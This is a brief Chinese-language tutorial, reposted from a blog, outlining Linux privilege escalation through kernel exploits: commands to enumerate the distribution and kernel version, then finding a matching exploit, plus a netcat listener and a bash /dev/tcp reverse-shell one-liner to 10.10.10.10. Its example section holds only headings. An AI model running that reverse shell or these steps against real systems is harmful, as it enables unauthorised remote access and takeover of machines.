转载自:http://wyb0.com/posts/Linux下系统漏洞提权/
0x00 Linux下的提权
Linux下一般都是系统漏洞提权,分为以下几个步骤:
1. 获取系统版本号 2. 根据系统版本号找对应exp 3. 反弹shell 4. 尝试利用
0x01 提权
- 获取系统版本号
- 获取发行版本
- cat /etc/*-release
- cat /etc/issue
- cat /etc/lsb-release
- cat /etc/redhat-release
- 获取内核版本
- cat /proc/version
- uname -a
- uname -mrs
- rpm -q kernel
- dmesg | grep Linux
- ls /boot | grep vmlinuz
- 获取发行版本
- 根据系统版本号找对应exp
- 反弹shell
- 本地:
nc -l -p 8888
- 目标机器:
/bin/bash -i >& /dev/tcp/10.10.10.10/8888 0>&1
- 本地:
- 尝试利用
0x02 实例
- 得到系统版本号
- 找对应exp
- 反弹shell
- 提权